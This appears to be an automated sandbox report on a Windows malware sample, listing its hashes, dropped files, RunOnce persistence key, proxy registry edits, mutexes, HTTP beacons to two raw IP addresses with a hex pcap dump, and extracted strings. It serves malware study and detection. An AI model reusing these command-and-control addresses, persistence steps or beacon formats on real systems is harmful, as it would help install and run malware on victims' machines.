Analysis Date: 2014-06-20 07:23:08
MD5: afeb57b496b344e67adee8e85d3ca692
SHA1: bf339840dd9489bc2b5d4c9650186ed5d2d085be

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: afb9d9ceca2bf895db297b1de94183ec sha1: b776112fca15c815a9eb0858fc5b9d8b0b57c642 size: 3072
Section .rdata — md5: 71bd85bb43b56450d4aa015c8d1872d4 sha1: dbb40b452fa1895ccf0567d2a2e531747189c5f2 size: 3072
Section .data — md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section .rsrc — md5: b9e5f4ac67b553058bddf82282fe3efb sha1: 4089230e3c7231bb0a63979d0e81d423434eb983 size: 4608
Timestamp: 1970-01-01 05:06:15 (PE header compile timestamp; an epoch-era value like this is unlikely to reflect the real build time)
PEhash: fa456a4c1a5018c55a107bf00ef0ccd6ba55aa0a
IMPhash: dccf31d8227df492e890fa1b0a7111b3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\bf339840dd9489bc2b5d4c9650186ed5d2d085be
Creates File: C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a394B.tmp
Deletes File: C:\bf339840dd9489bc2b5d4c9650186ed5d2d085be
Creates Process: "C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe" "C:\malware.exe"
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aE2C9.tmp"
Creates Mutex: Don't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jLfLgDb06108 ➝
C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe\\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Don't stop me! I give work and money for you!
Winsock DNS: 69.50.195.76

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE2C9.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=06108
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.76/install.php?affid=06108
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.76:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30363130 38204854 54502f31   fid=06108 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f696e 7374616c 6c2e7068   POST /install.ph
0x00000010 (00016)   703f6166 6669643d 30363130 38204854   p?affid=06108 HT
0x00000020 (00032)   54502f31 2e310d0a 52656665 7265723a   TP/1.1..Referer:
0x00000030 (00048)   20687474 703a2f2f 36392e35 302e3139    http://69.50.19
0x00000040 (00064)   352e3736 0d0a4163 63657074 3a202a2f   5.76..Accept: */
0x00000050 (00080)   2f2a0d0a 436f6e74 656e742d 54797065   /*..Content-Type
0x00000060 (00096)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000070 (00112)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000080 (00128)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000090 (00144)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000a0 (00160)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x000000b0 (00176)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000c0 (00192)   2e313b20 47544230 2e303b20 2e4e4554   .1; GTB0.0; .NET
0x000000d0 (00208)   20434c52 20312e31 2e343332 32290d0a    CLR 1.1.4322)..
0x000000e0 (00224)   486f7374 3a203639 2e35302e 3139352e   Host: 69.50.195.
0x000000f0 (00240)   37360d0a 436f6e74 656e742d 4c656e67   76..Content-Leng
0x00000100 (00256)   74683a20 37340d0a 436f6e6e 65637469   th: 74..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   44373145 41373231 43373845 32463336   D71EA721C78E2F36
0x00000150 (00336)   31353137 38354233 38344434 35463334   151785B384D45F34
0x00000160 (00352)   44373531 38393446 41303635 39393733   D751894FA0659973
0x00000170 (00368)   45334145 42453435 31363942 44424237   E3AEBE45169BDBB7
0x00000180 (00384)   30313034 31                           01041


Strings
..
~0DKJ,
0I\<6vFn
0]oJKN8
0$p7zl
0r[]Mdq1
>0(_.s$_
&-:]:1!
	1{4zB
1Amyq[
1m=m%{Y
1{[NO78*0Xy
@~*1p)
1TjVO\M
1WI:9!
- 2/%3
23@BGvE
2!8oE[
2{?g1`
2~rE[s9b
2{Rt<|
	_2\*|X
?;!`3$
/38L;A`
~3d-7Y
3eF<<mQ
3.J[1,
]3K"0:
([3L5.
3^N{[b
3Oy	pj	4
3&q5H2
-^3zm1uSe<
41k.X2
4AZ2RE#
\)4Cz`
&%4gz#
4yT}TQ
5?<1vj
+5H~-1
5^K%P|
5nG95TW
:~5o8fw
&5!qmg_6
{5\=w>[
-5ZL-J>
 62>P=
]66{\Pg
~^67&4
	6=a(n
?'6Z:$
/)7:/)7:/)7^),2D
"7,HTy1
@7m7"X
>7$o	 }
7r-Pud'j
7vb'W|
>7Y)4u
8Bs+vC
8-'JA-
8loJr;
8P9VFJ=
8Q!_<)
8Q)'Zgp1
+),8ZNSbOC-q-
9eo.;h>
9iH`r>
9k(1#+u
>9v?<gU
<9zW|*
A7C?Bk
A87":?
.A8%-;9
`A8<c1DQ
a8gyJo
A+a)p?
aAT!H6
AC(Xu+K
Ag#!t6
Aj|o	j
ak+NyK
a\kzDB
+AN;*u	
A)PTvFmQ
>asQ^r=
aTrksU
.[ ~avh
>AZ3He
b3H#"Z
B:4 lo
_b (AO
!+B<c]
]bC;T/
bd(7I>
BeginPaint
B+FOz{
$/bji]8
b/lVD:
_bo<\6
B~pTjH5
bRWT ^
Bs7n"?
+bs	SK~
bSuNn5ZJ
BTO=KE
BY.%XR~v
C`}8_&
cd	cH@
c=He[h<R
Ci]*!Xvq
CJg+ S*X
$ Ck3IW
*Cl+Cq:kaI
c'nUG+L
<cuJDv
c[:xaQ
+CXNgN
C|Z<'N
d01Kk(
d69`5 >
d6a(mV
D@7TC#<
D@9?6%
DAM}Opk
DestroyLinkInfo
dE',YbN
d.Gc>%
dH05G%Iu
dJtQP\
`dO9tea
D:Q<;7UM
Dq&V`4
DrawTextA
d]s[BQM
Dui5g2
D{UPsyA
DwWRUO
dY8vqPr
dzm0jS
E4ktQ)
E6}={[
e"\AUd
EBA'dd
~eCGm]
eC/lyQ\
EEidI|
ehAX@eg
e!hk>|6
EHmXfI
).[/-Ek=
E>?`$K
ek0$?F
E$!'KB
EndPaint
epR-1e%
e_ p]W
e	r{Y	'
evl,~j./r
ewFy(u/
eY/IbcI
e|Z0~x}
E\ZNW5
eZ~]y@q
\f*49<J
f9KxEn
fe2d"F
Ff$?@	
FG2Sa	
FgPi(ckaDWJ
Fi.A??|=
FillRect
(^f+j/e
f&jgQ0eD
FlushFileBuffers
)fm]sh
~FNhB[
FO37K;
F<oCoG
fPjFg6
FrameRect
FreeEnvironmentStringsA
fvE*S5r,
{fwj]5WJ
FzU]pA
,*!`G:
'G{2n N+
G8KBa4
|GC@+3
GdbJ$L
GetACP
GetCanonicalPathInfoA
GetClassNameA
GetCommandLineA
GetCompressedFileSizeA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCursorPos
GetDlgItem
GetFocus
GetLinkInfoData
GetLocaleInfoA
GetModuleHandleA
GetParent
GetStdHandle
GetSystemDirectoryA
GetWindow
GetWindowTextLengthA
%gEVv?
.*GeW-
GEy. !
g[%&=g
(GG=g[	
)-g`*H
:_ghDh
G<L4z2
glbT|*
<gLl+8?
GlobalFree
@];gLt
?gmiM8Y
(gN*XW
G+;oqb
G_%P+h
?@gQ#4_?
GQWsE1
GtlP(M
Gu($63
g",ur@
GUzUiE{
*G.Wv*
gYh0kW` W
|gy.Yh0o
G@Zo'v
GZx%GZx
H'[1x[;
h5gpIS
H6c?69
)h8U>y
HD(G8}QAZ
HeapCreate
&He-?T(
>HGXZVz
H^IIfg0
hJH`t:hH
"HkPj"
hl<DZa
!hq2!h
H{s@fG
h.tP!~
Hv/-p_
H)|wc~
H/X\8\
h x{"NN
hy/e'K#M`
HZOs8e/
hZU#kh
i0U}h@v)_
&=inKUX\q
InterlockedExchange
_I@'o$
IsDebuggerPresent
IsIconic
IsValidLinkInfo
?I"TUv
?i"U8$f
^iV<A	ot
!	IWS1
j2ql_+
>j~3 8Mp
'j'*5^
~.#jhfN
j	|kxu
JNf8EM
+jp|e@
j	%SK"
jTm$lT
j"vj}a
J+x_kX'+
JXy.KXy.K
[]#jZi
@|[ k0
;K=577
k7k5f5;
KB5#fe!
Kb-i`D
kCW)iX
KERNEL32.dll
Kjm;g2a
kKdMkK)
	"%k_L
k.LtZd/
;K=M2K
^kM/[u
kn$tHG
k=pt'M
KPt~W+
K'S~p<
KSZEn0?m
=kt}cQRg 
}k}]xR
?l(1=NjZI\l
L>1Q/A
L_5z31
L9xxJX
&}LAgJc9
lArS53%?
}@lCj/Y
LhN1:Y
LHq9ab
L#~.?I
LINKINFO.dll
l_jRFQm
=L!)=k-2
:?!Lm%
L#m]4|s#
lMU'W1
LM%w0L
"(LN-k
LogEventA
lq#H}CF
LRtJls
]L"s m
L`Tt>0!
lt]z_\
lwhUnL
lYI3Y	^#
m0@YB3g^G
.M2f(P^
M$<7}$d7
{*M850q
m.:c>(\
{!`M/>d
mDs#yj
mehX[O
mEJ!!M
M)^<IA
M<jn_nK
mLt^cG
m@ng>g
mnk'>9
mOevo^
!m*ow* _-
{MqD;\
mR~/!T0
M>T@#2
mTKT<u
.%?Mv<
MWmgmW#
Mxx2~>
mXXUP!
@M) Y3
N0eJRc>
N1I}&GO
N-=&2oHY,
n%?^*2V
N#=9;Kh
Nbfj!u/
NCN/]w0a
NDf8fp
n@j1pG
NjC]]=
`N_Laef
NQ4[=q
nRjx9kn
:nR*LV;
n|tg &~
nt	=~q
NY;1!I
;*NYb`
nzaXiq
._-NZy$
_O16@cs
O1S_wv
o4x+tGz
OaM,s2n
O&]EJtu
o<Fn=Y
of}=Q^
Oh3bQD
o(IL,]
oLJ{H1
oMb<{`
OOE`j_K
OpenSemaphoreA
:]opqJ
!oQY.XqX)
or0?AC&
O>#RUesY
?^O	+s
osBfey
oW|AW m
oW%OlW
oW&&we
O xbk@=_
oXI4J{f
;p?.@1
'P374	
P|3-F|X_C
( p4Vb7
;P|9<{ 
.p*c&_
pH$K.hp
plHVdb^c|
pMgu0fd]
p@p_Ky
PVokCa
p[|)xn
p;Y:V+
{.PZ;Y3
Q7rQZp
*qe0'iY
QHKcBZ
:=q<HS
,?q{iW
qIwft(P
:~Q{j\o7-
!QkV#}
q)"lm5J	
qnH[M>.Z
Q)NT<}y
,qo;U#R
qr?HCm\v
	q:T^lT
qVQ77g?
!Q"X|:
Qy"8 +%
QY/$L?Z
|{q}Zx(O
r0eECZ
R0wF4#
[r7m4QH
R9a"F]?zy!
rAbuo|5L
RaiseException
`.rdata
&rDG"z
!rEIATG_
ReleaseDC
ResolveLinkInfoA
RfhkYA
r!@Gdv>/
=rG&n5
=RLrsX#Tfz
ro6hX]
r		p+Y8
}*r q1
@"Rq{VK
r^S(SP
RTUTILS.dll
 +(R/v
r!WX;N
s3m/Bi
>s9oMhK
sC"NNK
seqA8C
SetActiveWindow
SetEvent
SetForegroundWindow
sF#FuH&
(sfl3w
sH$4jIfVk
s=`hj)
ShowWindow
=sJ^$m
SkIIR6
S	k?:z
*SL*Kl
sL?N U
smLe_o
sN)uq0@E
s#PB~=(
~_S>>PFc<
"sSGFR
sy^&ZWx
sZUX*]Y.i
t2.TO3
T3%=i6
t9e:t;eTt-r=tBr
tEe^*j	J
!This program cannot be run in DOS mode.
`TH)ul
#T|#Ja_{
|T_j|W
TN>^WY
}tPvrm?
tr6mpRy}
tsFW9V
t"s.I98y
tuBhz?w
'T]wVc:
T&{#XD
T~Z6jI`
)u:@(;
u6cHOxG
"ua`"ua`"~W
"uaX"uaX"~W
U:B Q_
ue6,R_
&uez&y
/u>I|2	
u`kk<)tk
uLLRk6
up25IiK
uq?:Y3
URS70>ao
USER32.dll
	uUcA<
,UWiIr$
uXlx{/
U_y<0;
-UYG0|s
v4+0Hr
v\59!W9h
v5|A{u
v5%b^K
V68m%?U
(v@&6f=
!v9sP!
ValidateRgn
Vb;Vq]/
vEgLTdk
vGf$G>
@vhh],
v|hq|m
,vi5<V
VirtualProtect
}v~K)n
v&;m^(
VMOX-t
\V$o/Q
v#'p-a
\]vqF{
&v&?QP
VUyxbNI
&VWd]qN
v|WQmk@\)
w25lh>(
W2^IdS
@{W]4/
w4[l#=
w&5BgdAu
W+7PCl
wCzt2[w6
w>Hl4i
W(jm	( 
W$j'Oz
wn~:OGZ
W=q^BY
WriteConsoleA
wsprintfA
wuiLpz
wwD&u=
wX~LyS
&W-YRb@[R
XC4@rm
X-Dg	@9
xE\~oL"
xF[,;1M
xH$-wH
 xjUyD
.(xk:`
xL9hDn
"x/Mg:
(-xP8G
Xq/?Or%1
xr>1y~
x{rO5x
XS{axN
Xtx[6J
XwG0v13
:<X#W>S0
Y2^4U1
Y2X6	3
Y6{7	K
Yfr1Ps
y}\In*
YKI#-Vw3
|)YRb,
Yt4\pf
_Y<wrRj
/YXvQRO
yzVRl/
z0qOw{
`z1M`MY3+
Z)4ba/
?Z6Xwz
z7ztVR{
@-Z}8.
?/Z$b-
z:cUWVgi
zE0;;2\cR
,}ZFuG
z=)GQA
z;.Hi[
z@ih9JvM^
Z,nDQ,
?Z|=.Oyegu
z+puJ[sf
ZS:DS[|_
Z\Sg+'